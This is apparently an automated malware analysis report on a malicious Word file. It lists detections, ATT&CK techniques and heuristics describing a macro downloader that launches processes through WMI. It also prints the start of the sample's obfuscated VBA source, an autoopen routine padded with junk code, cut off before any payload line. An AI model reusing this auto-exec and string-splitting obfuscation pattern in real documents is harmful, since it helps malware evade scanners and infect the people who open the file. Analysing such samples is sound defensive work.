MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros with an autoopen subroutine, a common technique for initial execution. Critical heuristics indicate the use of WMI (Win32_Process.Create) via obfuscated API calls, suggesting an attempt to launch a malicious process. This points to a macro-based downloader designed to execute a secondary payload.
Heuristics 8
-
ClamAV: Doc.Malware.00536d-6943632-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6943632-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31096 bytes |
SHA-256: 301dd1cad32999e3e38d68b7c4e33a071c7cf84b9394709cbdf385cfc30af934 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "dGAAkcUk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JBAQCUAG"
Attribute VB_Base = "0{3706901B-7C14-4493-BC76-D95B8185812D}{C52B5286-6452-4C8B-A5E1-72E6CA827AFA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "NAAADAk"
Attribute VB_Base = "0{86DF0F2C-B04B-4A12-99BD-FA26ADBEF63A}{ABD58C1E-B209-4851-A322-FD277A1EDD74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "bA4AQAA"
Sub autoopen()
If qDDU4xAZ = zCAABx Then
Select Case GAU_UQ
Case 313020248
kcZwUD = Rnd(Y_AkUA + 433259910 + 631033733 / WQcoAwCk)
SCBDAA = CByte(GxA4QAU + 540554134 + lcAAABoA + 127485574)
Case 833807425
O4ABCQ = S_kAZAU
r_AUxUAx = Tan(wwAAkCBA - CSng(zXoAoB))
End Select
End If
If vCUAQAA = WAXDBUUC Then
Select Case PQUcAw
Case 722805706
oD4wQA = Rnd(iocQCAGA + 749868034 + 322170587 / NAAoXAA)
iDAAADoB = CByte(J1UADAw + 366195369 + MAAZwA + 349919234)
Case 289221047
w1kxAQ = PDQAAAA
TA_CAAA = Tan(J1AAA4k - CSng(uAUc1A4))
End Select
End If
If dAQAkA = DAAADA Then
Select Case BBGBkoQ
Case 574135879
XAAQAG1Q = Rnd(iZUUXA + 821310439 + 266249854 / EZAADAxA)
UCBAoGDA = CByte(W1DwQQk + 284792844 + DAABUC + 885022769)
Case 472607600
hGAAAUG = bQQCA_Q
aBCAAQ4k = Tan(jCQABc - CSng(ZAUAoAAB))
End Select
End If
ZDD1kxw
If TGDB_AGQ = oADAAABw Then
Select Case MUUABB
Case 643392688
fAB4A1B = Rnd(kxBcAZ + 686204268 + 436790289 / hAAwZD4G)
PAXBAQAC = CByte(s4D4QDDA + 784422509 + GGGAQQD + 329070681)
Case 239976840
OkCQBcB = mxkkx_
VxDoDZXA = Tan(uxD4XAwA - CSng(oAUGGBUk))
End Select
End If
If jABA_QA = UAUQAAo Then
Select Case VBDA144G
Case 211042643
jAXA1Dk = Rnd(aCAxcxQ + 226736486 + 483130869 / Go_A_kX)
WAQDxA = CByte(zZCAAAw + 478141722 + VABUX4 + 167723750)
Case 527278098
B1AACAcU = AXcA1c
M4AUCAQA = Tan(fCCZcX - CSng(RQUA1ZDA))
End Select
End If
End Sub
Attribute VB_Name = "iDXC_1"
Function ZDD1kxw()
On Error Resume Next
If d4CxUAA = PAUBQAU Then
Select Case hQBCAx
Case 462647603
uQwABBG = Rnd(JAGADXc + 410388081 + 544235889 / cAkwADA)
lAQQ1BA = CByte(dBXUAQ + 257655836 + UGcZZ1 + 782678162)
Case 75223330
AUZBAQQ = GAAA4AcA
qBCCAo = Tan(LAAAwUB - CSng(DcA4A1Z))
End Select
End If
If KCoAAoB = wGAA1_w Then
Select Case i_D1AA
Case 962678222
bk4_BAAc = Rnd(aADBAAUA + 205648002 + 142667337 / OQAo4AA)
oAXA1xZ = CByte(o1AQAQB + 912759960 + aBABAC + 842415070)
Case 831969025
QcDQkABo = IoAUDwAQ
QUAAZcxA = Tan(WX1BXQw - CSng(CGGGACA))
End Select
End If
If 568 < 62696 Then
hZQoxc = vbFalse
If lAoAUA = oCAokcA Then
Select Case UAZxDA
Case 534896144
tA4A4c = Rnd(zCCGko + 580950651 + 318338970 / WQAAoAkD)
NAADAACD = CByte(S14oxwQ + 345214926 + vUAAkA + 314875698)
Case 728656857
CAZBxA = BoCZAXA
zkGAQDXQ = Tan(nA_CwUQ - CSng(oxoGAA))
End Select
End If
If TBcGUG = KAA_AQA Then
Select Case hABAAw
Case 392866508
D
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.